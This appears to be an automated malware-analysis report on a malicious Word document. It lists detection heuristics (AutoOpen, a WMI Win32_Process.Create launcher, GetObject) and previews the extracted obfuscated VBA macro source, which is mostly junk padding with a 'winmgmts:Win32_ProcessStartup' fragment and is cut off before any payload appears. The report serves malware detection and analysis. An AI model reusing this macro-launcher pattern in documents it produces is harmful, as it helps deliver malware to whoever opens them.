MALICIOUS
282
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1218.011 System Binary Proxy Execution: Rundll32
The sample contains VBA macros with an autoopen function, a common technique for initial execution. Critical heuristics indicate the use of WMI (Win32_Process.Create) to launch processes, suggesting the macro is designed to download and execute a secondary payload. The obfuscated nature of the VBA script prevents a more detailed analysis of its specific actions or the identification of a known malware family.
Heuristics 8
-
ClamAV: Doc.Malware.Dpzn-6865611-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Dpzn-6865611-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 71248 bytes |
SHA-256: e1f370ae22697459b7f6ba0690e5749b57126dc6075757d19fe8569418371aae |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "f187_8"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "z977___"
Function a_1581()
Select Case u8___54
Case 141956654
d552___6 = Log(j_38_100)
q7901_0 = CDate(383217487)
z95_63 = Fix(82874725 + 288995894 + u__1__5 - Oct(422425769))
h8472309 = Cos(55778994 - Sqr(18233992 - Atn(223715044)) - 505871206 + 542188259)
End Select
Select Case K85419
Case 698904148
p559471 = Log(i3849_)
j78141 = CDate(683132215)
H88_56_ = Fix(108701742 + 903813317 + W6_597_ - Oct(868090278))
u740_496 = Cos(533357870 - Sqr(341462270 - Atn(632316521)) - 476078404 + 625303488)
End Select
Select Case N1_0575
Case 701977373
c56590__ = Log(K77_0_)
l22_66_ = CDate(116663375)
X4_36_1 = Fix(149722758 + 950374534 + a1___4 - Oct(835659259))
z6___5 = Cos(799639788 - Sqr(688856533 - Atn(926479957)) - 31662013 + 485801454)
End Select
Select Case m9_27396
Case 129967426
Q3_6_825 = Log(w796_46)
o91_95 = CDate(361156810)
E45_9__ = Fix(556785616 + 189987487 + m7903_ - Oct(139650993))
n_351_55 = Cos(227596254 - Sqr(179206568 - Atn(55094878)) - 601259883 + 28286985)
End Select
Select Case L214561
Case 446761894
D109891_ = Log(c9162_15)
u95_706 = CDate(79311081)
K120__ = Fix(544391793 + 133731557 + w75_1910 - Oct(174089483))
n68_7__ = Cos(108067178 - Sqr(830594092 - Atn(240270869)) - 933336006 + 462380151)
End Select
Select Case Q__95_7_
Case 181428151
T_55_10 = Log(b19033_)
A__8__02 = CDate(11465388)
q94453 = Fix(288576367 + 4445074 + E_3_454 - Oct(313577242))
w_13_9 = Cos(858385195 - Sqr(110044792 - Atn(467801329)) - 600840426 + 769562470)
End Select
Select Case R252319_
Case 581567838
m5908_6 = Log(a_5_5_)
m53_392_ = CDate(94726157)
z88370 = Fix(784240438 + 100563284 + i_42268_ - Oct(547607043))
r__4698 = Cos(726651913 - Sqr(490859346 - Atn(773329240)) - 445049601 + 305139926)
End Select
Select Case T0199061
Case 915018603
Q82_9_ = Log(N71_8_)
i_98715 = CDate(960467444)
U_899969 = Fix(494251206 + 669914342 + d483355_ - Oct(513131520))
J_255_4 = Cos(252465362 - Sqr(165041257 - Atn(112004879)) - 777505065 + 383175555)
End Select
End Function
Function i31_44_3(d__238, z9_2808)
On Error Resume Next
Select Case D039_0_
Case 561105318
u2__740_ = Log(i_09_0)
K_7___ = CDate(424908732)
B86_13 = Fix(995228095 + 591838933 + R53_578 - Oct(844962620))
f_4__624 = Cos(15122566 - Sqr(113514629 - Atn(900718835)) - 537880740 + 298829582)
End Select
Select Case N5_8__
Case 643234527
K__0_91 = Log(o__2155)
t91908_ = CDate(953791872)
m37_53 = Fix(36705028 + 130603581 + Z816318 - Oct(293840588))
j448_5 = Cos(405331916 - Sqr(568244317 - Atn(174569073)) - 202165896 + 761099037)
End Select
Select Case W_8284
Case 354661361
Y587_7 = Log(V3_0493)
V308__ = CDate(85842245)
j43043 = Fix(227951588 + 465485581 + N99_589 - Oct(96498323))
K4524_3 = Cos(393927434 - Sqr(687833681 - Atn(609330789)) - 353246236 + 484255031)
End Select
v7505___ = b6___7_0 + "winmgmts:Win32_ProcessStartup" + j_65_4_2
Select Case B21_00
Case 323967573
D44563_6 = Log(P097_921)
N38305 = CDate(637051274)
z__8330_ = Fix(748891747 + 689424637 + s3056694 - Oct(178215419))
o_9_029 = Cos(10663314
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.